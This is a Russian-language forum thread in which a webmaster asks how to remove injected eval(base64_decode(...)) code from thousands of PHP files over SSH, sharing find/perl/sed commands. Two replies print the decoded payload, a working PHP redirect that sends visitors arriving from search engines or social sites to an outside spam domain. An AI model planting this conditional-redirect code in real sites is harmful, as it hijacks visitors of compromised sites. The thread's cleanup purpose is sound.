Приветствую всех.
На нескольких своих сайтах получил код в .php файлы
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
Пытался его удалить командами, подключившись по SSH. При это находился в директории с сайтом, где и надо было почистить файлы от кода:
данная команда вообще не помогла
find . -type f -name '*.php' -exec perl -pi -e 's/eval(base64_decode("DQp.*"));//g' '{}' ;
данная команда
find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*KfQ0KfQ==\"\)\)\;//g' '{}' \;
код удаляет, но сайт начинает криво отображаться.
а эта команда
find . -name \*php -execdir sed -i.tmp '{s/\(eval(base64_decode("\)[^"]*\("))\)/\1\2/}' {} +
код удаляет, сайт корректно отражается, но остаётся начало кода <?php eval(base64_decode("")); и старые заражённые файлы остаются в папке сайта с расширением *.tmp (к примеру wp-comments-post.php.tmp)
Чую, что где-то незначительная ошибка, а вот где... хотелось услышать пояснения спецов. Или подскажите какой командой удалить файлы *.tmp
Хелп, в общем...
- 14.10.2012 09:47
Последний раз редактировалось 13й; 14.10.2012 в 10:14. Причина: Уточнил
- 14.10.2012 09:59
13й, затронутых файлов очень много?
если много имручками лень, есть простой скрипт с заменой _http://cmsdev.org/files/replace.zip; сам не проверял работу, но вроде бы нормально работает.Последний раз редактировалось wolf28; 14.10.2012 в 10:24.
- 14.10.2012 10:20
- 14.10.2012 19:48
Так выложи весь код eval(base64_decode("... - его ведь можно раскодировать, а затем уже в полученном чистом php-коде редактировать. Вот в этой теме мне помогли, если не разберешься, кидай код, попробую.
- 14.10.2012 23:08Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
- 14.10.2012 23:17
13й,
PHP код:error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://minkof.sellclassics.com/");
exit();
}
}
}
}
}
Спасибо сказали:
13й(15.10.2012), - 14.10.2012 23:22Гуру

- Регистрация: 17.04.2011
- Сообщений: 672
- Репутация: 249
13й, посмотри вот здесь http://nashomsk55.ru/forum?func=view&id=441&catid=33 человек описывал как удалял вредоносный код со своего сайта.
Спасибо сказали:
13й(15.10.2012), - 14.10.2012 23:32PHP код:fizmatik, все правильно расшифровал)
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://minkof.sellclassics.com/");
exit();
}
}
}
}
}
Теперь этот код можно поставить вместо eval(base64_decode(... и редактировать его как угодно. - 15.10.2012 01:08
На тысячах файлов? Не проще ли данный код удалить?
Так-то я его и так сразу же декодировал. Только меня декодирование так-то мало занимало. Меня больше заботит его удаление со всех файлов.
Виктор1974, спасибо за линк, но таким образом удалять код с тысяч файлов при наличии SSH доступа - это каменный век, монотонная работа и куча потерянного времени.Последний раз редактировалось 13й; 15.10.2012 в 01:12.
- 15.10.2012 09:30
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
удаление сайта | Поисковые системы | 4 | 02.04.2012 20:51 |
Удаление дубликатов доменов из txt | Софт, скрипты, сервисы | 7 | 08.12.2011 22:40 |
Удаление дубликатов доменов из txt | Вопросы от новичков | 0 | 06.12.2011 12:22 |
Удаление файлов по FTP | Web программирование | 9 | 28.11.2010 02:24 |
Удаление ID новости в URL ( DLE ) | Софт, скрипты, сервисы | 4 | 28.08.2010 17:50 |







